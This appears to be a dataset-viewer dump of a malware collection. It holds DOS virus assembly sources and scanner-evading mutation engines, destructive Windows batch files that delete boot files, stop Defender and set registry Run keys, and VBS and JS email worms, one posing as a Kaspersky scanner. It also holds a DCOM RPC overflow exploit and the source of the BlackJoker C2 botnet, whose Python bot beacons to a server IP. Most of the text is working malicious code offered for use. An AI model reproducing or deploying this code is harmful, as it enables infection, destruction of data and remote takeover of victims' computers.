text stringlengths 0 20k |
|---|
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus will install itself memory resident, below the video memory.
;once this virus is in memory it will only infect COM files. It will not
;infect command.com.
;--------------------------- S T A R T -------------------------... |
PAGE 59,132
;
;
; ROOT
;
; Created: 30-Aug-92
; Passes: 5 Analysis Options on: none
;
;
data_0001e equ 78h
data_0002e equ 7C0Bh ;*
data_0003e equ 7C0Dh ;*
data_0004e equ 7C0Eh ;*
data_0005e ... |
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
... |
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; ... |
; RICHARDS.ASM -- R. Simmons Trojan
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 3 ; Trojan Horse
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start la... |
;------------------------------------------------------------------------------
;
; Rajaats Tiny Flexible Mutator (RTFM) V1.1 (C) 1994 by Rajaat
;
; Purpose : making it impossible to use scan strings
;
; Input :
; DS:SI = piece of code to encrypt
; ES:SI = place of decryptor+encrypted code
; CX ... |
PAGE ,132
VIRUS SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:VIRUS,DS:VIRUS
HOSSZ EQU VEG-KEZDET
KEZDET EQU $
INDIT: PUSH CX
TBLC: MOV DX,OFFSET TABL
CLD ; SZTRINGMUVELETEK NOVEKVO IRANYBA
MOV SI,DX ; SI TARTALMAZZA A TABLAZAT KEZDOCIMET
ADD SI,OFFSET FILKEZ-TABL
MOV DI,100H ; AZ ELSO HAROM BYTE VISSZAALLITASA
... |
PAGE 59,132
;
;
; FONTA
;
; Created: 19-Jan-92
; Code type: special
; Passes: 5 Analysis Options on: none
;
;
data_28e equ 1003h ;*
data_29e equ 1232h ;*
data_30e equ 180Ch ... |
Fact is a 45 bytes overwriting resident COM/EXE infector. Infects files at
load and/or execute program by overwriting the infected file.
Compile Fact with Turbo Assembler v 4.0 by typing:
TASM /M FACT.ASM
TLINK /t /x FACT.OBJ
.model tiny
.code
org 100h
code_begin:
mov ax,3521h ; Get interru... |
Ŀ
This Virus Came To You By Way Of...
... |
;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth
;------------------------------------------------------------------------
;This source has been lying around for a veeeeeery long time, and I will
;*NOT* continue to make newer versions of J4J, so that is the reason
;why I release the source.
;
;... |
;-------------------------------------------------------------------;
; Simple little program to change the date to July 13th, 1990 ;
; Which just happens to be a Friday...what a coincidence.... ;
; This should be great fun if you have a virus or a program that ;
; goes *BOOM* on Friday the 13th, such a... |
title FREE.ASM
page,132
cseg segment para 'code'
assume cs:cseg
main proc far
org 100h
start:
jmp begin
banner db 0ah,'FREE Vers 1.0 - Sept. 1985 - by Art Merrill',0dh,0ah,'$'
db 'Copyright (C) 1985',0dh,0ah,'$'
db ... |
; FS.ASM -- Fuckin Shit Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc ... |
code segment'code'
assume cs:code, ds:code, ss:code, es:code
org 100h
dta equ endcode + 10
fatmanid equ 34
start:
jmp virus
hoststart:
db 90h,90h,90h ;NOP
db 0cdh,020h,1ah,1ah ;INT 20
hostend:
virus:
... |
; VirusName: Fight Fire With Fire
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-22-1993
;
; This is an mutation of 7th-son from 'Unknown'.
; Many thanks to the scratch coder of 7th-son.
;
; We've tried this virus ourself, and it works just fine.
; Non-overwriting, adds 473 to any comfil... |
;
; Feeblemind
;
Start: Jmp Install
Old21 Dd 0
Org21 Dd 0
Inc10: Add Ah,10h
Eoi: Jmp Dword Ptr Cs:[Org21]
New21: Sub Ah,10h
Cmp Ax,3b00h
Jne Inc10
Push Ax
Push Bx
Push Cx
... |
; FLU_NOT.ASM Routines to be linked into your FluShot+ resistant
; programs.
; Version 1.0 27 November 1991
;
; Written by Dark Angel and Demogorgon of PHALCON/SKISM Co-op
; Look for more Anti-Anti-Viral Utilities from us!
;
; Notes:
; This is different from the C routines. Call Flu_Not to disable and
... |
; VirusName: Fade to Black
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-29-1993
;
; This is a mutation of Creeping Tormentor, whick was discovered
; in Feb 1992. The origin is "unknown" (attention Patricica), it's
; written in Sweden by Tormentor / Demoralized Youth
; Many thanx goes ... |
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H... |
;
; How to fool TB-Clean using the prefetch queue.
;
; Conzouler / Immortal Riot 1995.
;
; (Ideas from 40Hex magazine issue 7)
;
; Debuggers like TB-Clean reads one instruction a time from
; memory while the processor will read 16 and put them in a
; prefetch queue. Therefore, if you change code that ... |
; -
; Firecide u2 - (c)1995 irogen - Using iCE v0.2
; -
;
; Infects COM and EXE when executed.
; COM Infection marker: fourth byte is 0
; EXE infection marker: Checksum in header not equal to 0.
; Time/Date do not change
; Read-only and hidden files will be infected, and attributes restored.
; Virus installs it... |
; ------------------------------------------------------------------------------
;
; - Faces of Death -
; Created by Immortal Riot's destructive development team
; (c) 1994 The Unforgiven/Immortal Riot
;
; ------------------------------------------------------------------------... |
PAGE 59,132
;
;
; FIVE
;
; Created: 18-Jan-91
; Version: ... |
;
; The ULTImate MUTation Engine .93 (c) 1993 Black Wolf Enterprises
; pardon the title, had to think of something... }-)
;
;ULTIMUTE is a mutation engine written for security-type applications and
;other areas where mutation of executable code is necessary. For my personal
;use, I have implemented... |
Lame Unix Viruses
+---------------+
Well, you might have read the title to this article and thought, well
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
be answered quite simply, we had one free space! :) It was a bit of
a dilemma to begin with, we had four articles and one space. ... |
PAGE 59,132
;
;
; USSR711
;
; Created: 9-Feb-92
; Passes: 5 Analysis Options on: AW
;
;
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_... |
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* ... |
PAGE 59,132
;
;
; USSR707
;
; Created: 9-Feb-92
; Passes: 5 Analysis Options on: AW
;
;
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_... |
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;---------------------------------------------------------------------------------------------------
; AV-Product | Detected? | Comm... |
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
... |
This is zip contains the original zip as received.
Archive: orig-vcl.zip
Nun-Beaters Anonymous:Go ON! Give In To the URGE
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
19210 Stored 19210 0% 1992-07-05 12:00 0ad4abbf INSTALL.EXE
... |
Routine List for Virus Creation Laboratory
------------------------------------------
This file contains a list of the routines inclueded with V.C.L. as
it is shipped. Routines under the "Effect Procedures" are possible effects
that your creation might have and are included in VCL.DAT. Routines listed
under "Condit... |
Examples Included with V.C.L.
-----------------------------
I've whipped up a few examples with V.C.L. to show you it's
true capabilities. In less than thirty minutes I created seven
good viruses and a trojan, all unique. None of this Manta-clone
shit or plug-and-chug stock trojans you find with other
virus/troj... |
Documentation for FILE2DB
-------------------------
FILE2DB is a nice little utility written by my friend Rigor
Mortis that will convert a binary file into assembler define byte
(DB) instructions. This is great for converting virii to data and
using them with the drop_program routine and otherwise converting
oth... |
VCL Configuration File
Unknown User -D TASM /mx /m2 /q /t
J VCL p p t x ? 0 > 0 / G G 2 @f |
/* C Logic bomb test module for Virus Creation Laboratory
(C) 1992 Nowhere Man and [NuKE] WaReZ
Written by Nowhere Man
Link this with the .OBJ file of your logic bomb for testing purposes.
*/
#include <stdio.h>
extern void logic_bomb(void);
int main(void)
{
register int i;
logic_bomb();
for (i = 1; i ... |
; EARTHDAY.ASM -- Earth Day Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main pr... |
; YANKEE2.ASM -- Yankee Doodle ][
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main... |
; VMESSIAH.ASM -- Viral Messiah Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not T... |
; DONTELLO.ASM -- Donatello Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
co... |
; KINISON.ASM -- Sam Kinsion Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main p... |
; CODEZERO.ASM -- Code Zero Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main pr... |
; RICHARDS.ASM -- R. Simmons Trojan
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 3 ; Trojan Horse
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start la... |
; PEARLHBR.ASM -- Pearl Harbor Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 2 ; Spawning Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start ... |
# Malware
This is my first controbution!
And because I want to give something meaningful as well as just mess around, this repo is a collection of fun little viruses that pack a mean punch.
If you know anything about hacking you will know that batch files are commonly the scum of the hacking world, most tutorials wi... |
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowsc... |
[autorun]
open=system_meltdown.bat
open=Shutdowns.bat
open=crashespc.bat
open=Disablenet.bat
|
{
"addons": [
],
"buildpacks": [
{
"url": "https://github.com/heroku/heroku-buildpack-ruby"
},
{
"url": "https://github.com/SoulSploit/Malware"
}
],
"description": "Tester For Malware repo SoulSploit Github Pipeline",
"env": {
"GITHUB_USERNAME": "",
"OTHER_VAR": "staging... |
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurr... |
theme: jekyll-theme-hacker |
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
|
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwin... |
# The-MALWARE-Repo
A repository full of malware samples.
|
Download Link: https://www.bonzi.link/
Expand Dong!!!!!!
|
This code was taken from a working mirror of the originall youareanidiot.org website,
the working mirror is a website called youareanidiot.cc.
It hosts the original code of the you are an idiot version that we all love, it is harmless.
The maker of the website is Endrmanch a well known youtuber in the malware community... |
<html><head>
<title>You are an idiot!</title>
<script src="scripts/you.js"></script>
</head>
<body onload="flagRun=1;playBall();return true;" topmargin="0" marginwidth="0" marginheight="0" leftmargin="0" bgcolor="#ffffff">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.m... |
function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="lol.html";
var title="Idiot!";
window.external.AddFavorite(url,title);
}
}
var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
funct... |
<html><head>
<title>You are an Idiot! (dot cc)</title>
<meta name="Author" content="The ADR and Jazzy" (2020 "Endermanch")>
<meta name="Keywords" content="you are an idiot, you, are, an, idiot, fool, youdontknowwhoiam.org, youdontknowwhoiam, you dont know who i am, you, dont, know, who, i, am, org, dot, aregner,... |
This is the you are an idiot version
that runs by clicking on the exe file.
|
https://gist.github.com/yorickdewid/a9fb98da3c367b360e36
|
https://github.com/yorickdewid/Sasser
|
Hello! Please check out my project on github.
It is called Loveware, an email and net-worm.
You can participate in the project if you want,
because this peace of malware is community driven.
Official Repository: https://github.com/TheG0df2ther/Loveware/blob/master/Loveware/Loveware.bat
Regards,
TheG0df2ther
|
<html>
<head>
<title>You are an idiot!</title>
<script language=Javascript>
function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="http://offiz.bei.t-online.de/idiot.html";
var title="Idiot!";
window.external.AddFavorite(url,tit... |
@echo off
echo YOU HAVE BEEN HACKED!!!>>AUTOEXEC.BAT
echo YOU HAVE BEEN HACKED!!!>>AUTOEXEC.BAT
echo echo.>>AUTOEXEC.BAT
echo :HACK>>AUTOEXEC.BAT
echo GOTO HACK>>AUTOEXEC.BAT
|
@echo off
@echo off
net session >nul 2>&1
if %errorLevel% == 0 (
goto run
) else (
echo Please run as admin!
pause
exit
)
:run
net stop "SDRSVC"
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
net stop "security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
net stop "wuauserv"... |
Sorry but the maximum file size on Git Hub is 25 MB
and Bonzi Kill is much bigger.
You will need to download the sample from here:
https://www.mediafire.com/file/s4cvr6unh33kye4/BonziKill.zip/file
|
'VBS.CarewMR.a By Jadraquer Killer (Mr.Carew)
On Error Resume Next
Set carew= CreateObject("WScript.Shell")
'In memory of Rocio and Pamela :)
Msgbox "Welcome to CLRAV of Kaspersky Labs, press OK or Accept to Start scanning your computer. "
Msgbox "ERROR!, Code error:321255... |
Download link: https://www.mediafire.com/file/963hblepyiq4svo/WinXP.Horror.Destructive__%28Created_By_WobbyChip%29.7z/file
|
/*
DCOM RPC Overflow Discovered by LSD
-> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
Based on FlashSky/Benjurry's Code
-> http://www.xfocus.org/documents/200307/2.html
Written by H D Moore <hdm [at] metasploit.com>
-> http://www.metasploit.com/
Ported to Win32 by Benjamin Lauzire <blau... |
rem special goat, do not spread! m.s.
dim fso ,WindowsScriptShell
dim WindowsDir,WindowsSystemDir,WindowsRecentDir
dim MySelf ,MyNewName ,CopyToSend ,MyCode ,MyFile
Main
sub Main()
On Error Resume Next
Initialize
InfectComputer
... |
<html>
<head>
<title>
BubbleBoy is back!
</title>
</head>
<body alink="#ffffff" bgcolor="#000000" link="#ffffff" text="#ffffff" vlink="#ffffff">
<font face="arial" size="4">
<strong>
The BubbleBoy incident, pictures and sounds
</strong>
<br>
<br>
<a href="http://www.towns.com/dorms/tom/bblboy.htm">http://www.towns.com/... |
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.S... |
<!--Lee from Germany-->
<html><body bgcolor="#0000FF" link="#000080">
<FONT SIZE=3 PTSIZE=10><BR>
***small but very funny***<BR>
<BR>
<< Selbst Explodierende E-Mails<BR>
<BR>
Hushmail.com..Dank Java-Applet-Verschlsselung sind ihre E-Mails unknackbar.<BR>
<BR>
Aber jetzt setze ich noch eines Drauf.<BR>
Ihre E-Mails ... |
'Lynx_[RAtm].Worm
'I_hate_you
function random(n)
Random=Int(n*rnd)
end function
'-----------------------------------------------------------------
sub mail()
on error resume next
dim OutlookObject,outmail,index
set outlookObject = createobject("outlook.application")
for index = 1 to 80
set outmail= outlookobject.create... |
MSFT A D 4 I/ SDEST yScriptletTypeLib2<HTML>
<TITLE>MS-DOS</TITLE><BODY BGCOLOR=#000000></BODY>
9<SCRIPT LANGUAG... |
/*******************************************************************
* Created by [Black Flag] *
*******************************************************************/
var TF=WScript.ScriptFullName,FS=new ActiveXObject("Scripting.FileSystemObject"),
SS=new ActiveXObject("WScript.... |
Download Link: https://www.babylon-software.com/download
|
# BlackJokerV0.3
**BlackJoker是一个由Golang来开发服务端使用Python来开发客户端的C2BotNet**
构架:
> BlackJoker采用C&S构架,使用HTTP反向代理通信,**目前没有开发流量加密中间件**,它拥有类似Msf的内部Shell
环境要求:
1.打开目录下的config.json文件,配置你的相关参数
2.Mysql数据库,并先行创建你在config.json中设置的表名
3.需要自定义编译客户端需要Pyinstaller or Cython工具
```
pyinstaller -F -add-data "R-Cadimn.jpg" main.py
```
开发... |
package main
import (
jsonOSsystemDB "BlackJoker/Mysql"
VARBLACK "BlackJoker/VarData"
"encoding/base64"
"encoding/json"
"fmt"
"io"
"log"
"net"
"net/http"
"os"
"os/exec"
"path/filepath"
"strings"
"time"
"github.com/gin-gonic/gin"
)
type RoutingGroup struct{}
func ifAndObtainHostNameExistence(input str... |
package main
import (
VARBLACK "BlackJoker/VarData"
"bufio"
"fmt"
"log"
"os"
"path/filepath"
"strings"
"time"
)
func handleHelp() {
fmt.Println("\n####################################\n&& SessionList > 获取在线Bot\n&& Shell {BotName} > 进入某Bot的Shell\n&& exit > 安全退出程序\n&& Attack > 进入特殊攻击模块\n&& GVirus > 生成基础病毒(需要管理... |
{
"ServerIp": "10.47.14.16",
"MysqlUserName":"root",
"MysqlPassword":"123456",
"MysqlIp":"127.0.0.1",
"MysqlPort":"3306",
"MysqlDbName":"jsonossystem"
}
|
package VARBLACK
import (
"sync"
"time"
)
type OSini struct {
Cookie string `json:"WhoamiName"`
SystemName string `json:"systemName"`
SysPath string `json:"sysPath"`
Cpu string `json:"Cpu"`
CpuArchItecture string `json:"CpuArchItecture"`
IP string `json:"ip"`
Ad... |
# -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['Virus.py'],
pathex=[],
binaries=[],
datas=[],
hiddenimports=[
'os',
'os.path',
'pathlib',
... |
from distutils.core import setup
from Cython.Build import cythonize
import numpy
setup(
ext_modules = cythonize("BlackJokerpyx.pyx"),
include_dirs=[numpy.get_include()]
)
|
import BlackJokerpyx # type: ignore
import threading
if __name__ == "__main__":
if BlackJokerpyx.init_server():
# 启动线程
threads = [
threading.Thread(target=BlackJokerpyx.shell_os_http),
threading.Thread(target=BlackJokerpyx.heartbeat_http),
threading.Thread(target... |
# -*- coding:utf-8 -*-
# cython: language_level=3
import base64
import getpass
import json
import os
import platform
import random
import shutil
import socket
import string
import threading
import time
from PIL import Image
import subprocess
import requests
# 服务器IP地址
ServerIP = "10.47.13.25"
current_directory = os.get... |
# -*- coding:utf-8 -*-
# cython: language_level=3
import base64
import getpass
import json
import os
import platform
import random
import shutil
import socket
import string
import threading
import time
from PIL import Image
import subprocess
import requests
# 服务器IP地址
ServerIP = "%s"
current_directory = os.getcwd()
de... |
b l i n k e r = = 1 . 7 . 0
c e r t i f i = = 2 0 2 3 . 1 1 . 1 7
c h a r s e t - n o r m a l i z e r = = 3 . 3 . 2
c l i c k = = 8 . 1 . 7
c o l o r a m a = = 0 . 4 . 6
C y t h o n = = 3 . 0 . 7
e x t e n s i o n = = 1 . 0 . 0
F l a s k = = 3 . 0 . 0
i d n a = = 3 . 6
i t s d a n g ... |
package jsonOSsystemDB
import (
VARBLACK "BlackJoker/VarData"
"database/sql"
"fmt"
"log"
"strings"
_ "github.com/go-sql-driver/mysql"
)
var DB *sql.DB
func InitDB() error {
dsn := fmt.Sprintf("%s:%s@tcp(%s:%s)/%s", VARBLACK.Config.MysqlUserName, VARBLACK.Config.MysqlPassword, VARBLACK.Config.MysqlIp, VARBLAC... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.